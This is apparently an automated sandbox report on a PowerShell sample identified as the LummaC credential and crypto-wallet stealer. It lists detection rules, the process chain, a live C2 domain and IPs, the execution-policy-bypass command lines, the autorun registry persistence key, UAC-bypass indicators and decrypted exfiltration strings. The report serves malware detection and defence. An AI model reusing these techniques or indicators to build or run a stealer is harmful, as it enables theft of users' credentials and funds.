Edit tour

Windows Analysis Report
IaslcsMo.txt.ps1

Overview

General Information

Sample name:	IaslcsMo.txt.ps1
Analysis ID:	1561784
MD5:	d7c9613ed12144aea20bee90fd5057e5
SHA1:	268f3d77e4b82f68c842a4c01f96a6ba864c09fb
SHA256:	aa22e017141e1c5974e00c72f2de158072cf9279cfedff86ac1734c6947a19e8
Tags:	c2lummac2ps1user-X0th3r
Infos:

Detection

LummaC Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

Yara detected UAC Bypass using CMSTP

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Connects to a pastebin service (likely for C&C)

Found direct / indirect Syscall (likely to bypass EDR)

Found hidden mapped module (file has been removed from disk)

Found suspicious powershell code related to unpacking or dynamic code loading

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Maps a DLL or memory area into another process

Powershell drops PE file

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Sigma detected: Suspicious PowerShell Parameter Substring

Sigma detected: Suspicious Script Execution From Temp Folder

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Uses an obfuscated file name to hide its real file extension (double extension)

Writes to foreign memory regions

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Searches for user specific document files

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Msiexec Initiated Connection

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

powershell.exe (PID: 4888 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\IaslcsMo.txt.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 1260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Set-up.exe (PID: 6856 cmdline: "C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe" MD5: 11C8962675B6D535C018A63BE0821E4C)

more.com (PID: 1228 cmdline: C:\Windows\SysWOW64\more.com MD5: 03805AE7E8CBC07840108F5C80CF4973)

conhost.exe (PID: 5328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

msiexec.exe (PID: 2044 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 9D09DC1EDA745A5F87553048E57620CF)

powershell.exe (PID: 6876 cmdline: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\PV4FLS06WTLN3UEUG7G.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Set-up.exe (PID: 5944 cmdline: "C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe" MD5: 11C8962675B6D535C018A63BE0821E4C)

Set-up.exe (PID: 2944 cmdline: "C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe" MD5: 11C8962675B6D535C018A63BE0821E4C)

cleanup

Malware Configuration

Threatname: LummaC

{"C2 url": ["marchhappen.cyou"], "Build id": "MeHdy4--pl8vs06"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000006.00000002.2079070422.0000000005222000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000000A.00000002.2169845795.0000000003A07000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000008.00000002.2088561371.0000000003869000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000009.00000002.2312046061.0000000004BDA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000003.00000002.1981445677.0000000003AF6000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: powershell.exe PID: 4888	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x20287ba:$b1: ::WriteAllBytes( 0x2028787:$b2: ::FromBase64String( 0x1d5d4:$s1: -join 0x1d5fd:$s1: -join 0x1d771:$s1: -join 0x1d7ad:$s1: -join 0x7011e8:$s1: -join 0x70129c:$s1: -join 0xc29cb9:$s1: -join 0xc2eef3:$s1: -join 0xc2ef7a:$s1: -join 0x1b5980b:$s1: -join 0x1b59834:$s1: -join 0x1b599a8:$s1: -join 0x1b599e4:$s1: -join 0x2aab381:$s1: -join 0x2ab0174:$s1: -join 0x31f9d20:$s1: -join 0x322701e:$s1: -join 0x32270a5:$s1: -join 0x3229004:$s1: -join
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 2 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
10.2.Set-up.exe.3a53944.7.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
10.2.Set-up.exe.3a53944.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1dd27:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1ddb2:$s1: CoGetObject 0x1dd0b:$s2: Elevation:Administrator!new:
8.2.Set-up.exe.38b6544.8.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
8.2.Set-up.exe.38b6544.8.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1d127:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1d1b2:$s1: CoGetObject 0x1d10b:$s2: Elevation:Administrator!new:
3.2.Set-up.exe.3afd877.10.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
3.2.Set-up.exe.3afd877.10.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x62df4:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x62e7f:$s1: CoGetObject 0x62dd8:$s2: Elevation:Administrator!new:
3.2.Set-up.exe.3b42944.9.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
3.2.Set-up.exe.3b42944.9.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1dd27:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1ddb2:$s1: CoGetObject 0x1dd0b:$s2: Elevation:Administrator!new:
8.2.Set-up.exe.38b5944.7.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
8.2.Set-up.exe.38b5944.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1dd27:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1ddb2:$s1: CoGetObject 0x1dd0b:$s2: Elevation:Administrator!new:
9.2.msiexec.exe.4c266cd.5.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
9.2.msiexec.exe.4c266cd.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1d127:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1d1b2:$s1: CoGetObject 0x1d10b:$s2: Elevation:Administrator!new:
9.2.msiexec.exe.4c25acd.3.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
9.2.msiexec.exe.4c25acd.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1dd27:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1ddb2:$s1: CoGetObject 0x1dd0b:$s2: Elevation:Administrator!new:
10.2.Set-up.exe.3a54544.6.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
10.2.Set-up.exe.3a54544.6.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1d127:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1d1b2:$s1: CoGetObject 0x1d10b:$s2: Elevation:Administrator!new:
3.2.Set-up.exe.3b43544.8.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
3.2.Set-up.exe.3b43544.8.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1d127:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1d1b2:$s1: CoGetObject 0x1d10b:$s2: Elevation:Administrator!new:
6.2.more.com.526e6cd.4.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
6.2.more.com.526e6cd.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1d127:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1d1b2:$s1: CoGetObject 0x1d10b:$s2: Elevation:Administrator!new:
8.2.Set-up.exe.3870877.9.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
8.2.Set-up.exe.3870877.9.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x62df4:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x62e7f:$s1: CoGetObject 0x62dd8:$s2: Elevation:Administrator!new:
6.2.more.com.5228a00.3.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
6.2.more.com.5228a00.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x62df4:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x62e7f:$s1: CoGetObject 0x62dd8:$s2: Elevation:Administrator!new:
6.2.more.com.526dacd.2.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
6.2.more.com.526dacd.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1dd27:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1ddb2:$s1: CoGetObject 0x1dd0b:$s2: Elevation:Administrator!new:
10.2.Set-up.exe.3a0e877.9.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
10.2.Set-up.exe.3a0e877.9.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x62df4:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x62e7f:$s1: CoGetObject 0x62dd8:$s2: Elevation:Administrator!new:
9.2.msiexec.exe.4be0a00.4.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
9.2.msiexec.exe.4be0a00.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x62df4:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x62e7f:$s1: CoGetObject 0x62dd8:$s2: Elevation:Administrator!new:
Click to see the 25 entries

Other

Source	Rule	Description	Author	Strings
amsi64_4888.amsi.csv	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x1dbbdd3:$b1: ::WriteAllBytes( 0x1dbbd9f:$b2: ::FromBase64String( 0x1dc9fac:$s1: -join 0x1dc3758:$s4: += 0x1dc381a:$s4: += 0x1dc7a41:$s4: += 0x1dc9b5e:$s4: += 0x1dc9e48:$s4: += 0x1dc9f8e:$s4: += 0x1dd4e19:$s4: += 0x1dd4f1d:$s4: += 0x1dd8379:$s4: += 0x1dd8a59:$s4: += 0x1dd8f0f:$s4: += 0x1dd8f64:$s4: += 0x1dd91d8:$s4: += 0x1dd9207:$s4: += 0x1dd974f:$s4: += 0x1dd977e:$s4: += 0x1dd985d:$s4: += 0x1ddbaf4:$s4: +=

Sigma Signatures

System Summary

Sigma detected: Suspicious PowerShell Parameter Substring

Source: Process started

Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\PV4FLS06WTLN3UEUG7G.ps1", CommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\PV4FLS06WTLN3UEUG7G.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\SysWOW64\msiexec.exe, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 2044, ParentProcessName: msiexec.exe, ProcessCommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\PV4FLS06WTLN3UEUG7G.ps1", ProcessId: 6876, ProcessName: powershell.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\PV4FLS06WTLN3UEUG7G.ps1", CommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\PV4FLS06WTLN3UEUG7G.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\SysWOW64\msiexec.exe, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 2044, ParentProcessName: msiexec.exe, ProcessCommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\PV4FLS06WTLN3UEUG7G.ps1", ProcessId: 6876, ProcessName: powershell.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\IaslcsMo.txt.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\IaslcsMo.txt.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\IaslcsMo.txt.ps1", ProcessId: 4888, ProcessName: powershell.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4888, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NetUtilityApp

Sigma detected: Msiexec Initiated Connection

Source: Network Connection

Author: frack113: Data: DestinationIp: 172.67.129.193, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 2044, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49736

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4888, TargetFilename: C:\Users\user\AppData\Roaming\VWPGdipf\QtCore4.dll

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\IaslcsMo.txt.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\IaslcsMo.txt.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\IaslcsMo.txt.ps1", ProcessId: 4888, ProcessName: powershell.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-24T10:15:42.721946+0100	2028371	3	Unknown Traffic	192.168.2.4	49736	172.67.129.193	443	TCP
2024-11-24T10:15:45.024490+0100	2028371	3	Unknown Traffic	192.168.2.4	49737	172.67.129.193	443	TCP
2024-11-24T10:15:47.799420+0100	2028371	3	Unknown Traffic	192.168.2.4	49738	172.67.129.193	443	TCP
2024-11-24T10:15:50.526551+0100	2028371	3	Unknown Traffic	192.168.2.4	49739	172.67.129.193	443	TCP
2024-11-24T10:15:53.127200+0100	2028371	3	Unknown Traffic	192.168.2.4	49740	172.67.129.193	443	TCP
2024-11-24T10:15:56.001194+0100	2028371	3	Unknown Traffic	192.168.2.4	49741	172.67.129.193	443	TCP
2024-11-24T10:15:58.459760+0100	2028371	3	Unknown Traffic	192.168.2.4	49742	172.67.129.193	443	TCP
2024-11-24T10:16:01.604187+0100	2028371	3	Unknown Traffic	192.168.2.4	49743	172.67.129.193	443	TCP
2024-11-24T10:16:04.303857+0100	2028371	3	Unknown Traffic	192.168.2.4	49746	172.67.75.40	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-24T10:15:43.407555+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49736	172.67.129.193	443	TCP
2024-11-24T10:15:45.896140+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49737	172.67.129.193	443	TCP
2024-11-24T10:16:02.601435+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49743	172.67.129.193	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-24T10:15:43.407555+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49736	172.67.129.193	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-24T10:15:45.896140+0100	2049812	1	A Network Trojan was detected	192.168.2.4	49737	172.67.129.193	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-24T10:15:48.813349+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	49738	172.67.129.193	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: more.com.1228.6.memstrmin

Malware Configuration Extractor: LummaC {"C2 url": ["marchhappen.cyou"], "Build id": "MeHdy4--pl8vs06"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\gvpkoxippfwsu

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000006.00000002.2086807895.00000000058A0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: marchhappen.cyou
Source: 00000006.00000002.2086807895.00000000058A0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000006.00000002.2086807895.00000000058A0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000006.00000002.2086807895.00000000058A0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000006.00000002.2086807895.00000000058A0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000006.00000002.2086807895.00000000058A0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Workgroup: -

Source: Set-up.exe, 00000003.00000002.1986587085.000000006F009000.00000002.00000001.01000000.0000000C.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_e9cfe911-2

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 10.2.Set-up.exe.3a53944.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Set-up.exe.38b6544.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Set-up.exe.3afd877.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Set-up.exe.3b42944.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Set-up.exe.38b5944.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.msiexec.exe.4c266cd.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.msiexec.exe.4c25acd.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Set-up.exe.3a54544.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Set-up.exe.3b43544.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.more.com.526e6cd.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Set-up.exe.3870877.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.more.com.5228a00.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.more.com.526dacd.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Set-up.exe.3a0e877.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.msiexec.exe.4be0a00.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.2079070422.0000000005222000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2169845795.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2088561371.0000000003869000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2312046061.0000000004BDA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1981445677.0000000003AF6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Users\user\AppData\Roaming\VWPGdipf\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 172.67.129.193:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.129.193:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.129.193:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.129.193:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.129.193:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.129.193:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.129.193:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.129.193:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.75.40:443 -> 192.168.2.4:49746 version: TLS 1.2

Source:	Binary string: C:\Users\Mark\code\github\NAudio\NAudio\obj\Release\net35\NAudio.pdb source: powershell.exe, 00000000.00000002.1921287558.000001F944CAF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: msvcr100.i386.pdb source: powershell.exe, 00000000.00000002.1921287558.000001F944CAF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp
Source:	Binary string: msvcp100.i386.pdb source: Set-up.exe, 00000003.00000002.1986094707.000000006EEF1000.00000020.00000001.01000000.0000000E.sdmp, Set-up.exe, 00000008.00000002.2093630497.000000006EEF1000.00000020.00000001.01000000.0000000E.sdmp
Source:	Binary string: dmprocessxmlfiltered.pdbGCTL source: more.com, 00000006.00000002.2086807895.00000000058A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: Set-up.exe, 00000003.00000002.1984108854.00000000042C4000.00000004.00000001.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.1982331918.0000000003BBC000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.1983371696.0000000003F10000.00000004.00000800.00020000.00000000.sdmp, more.com, 00000006.00000002.2082451784.00000000052E0000.00000004.00001000.00020000.00000000.sdmp, more.com, 00000006.00000002.2069602277.0000000004E7F000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2089391977.000000000393A000.00000004.00000020.00020000.00000000.sdmp
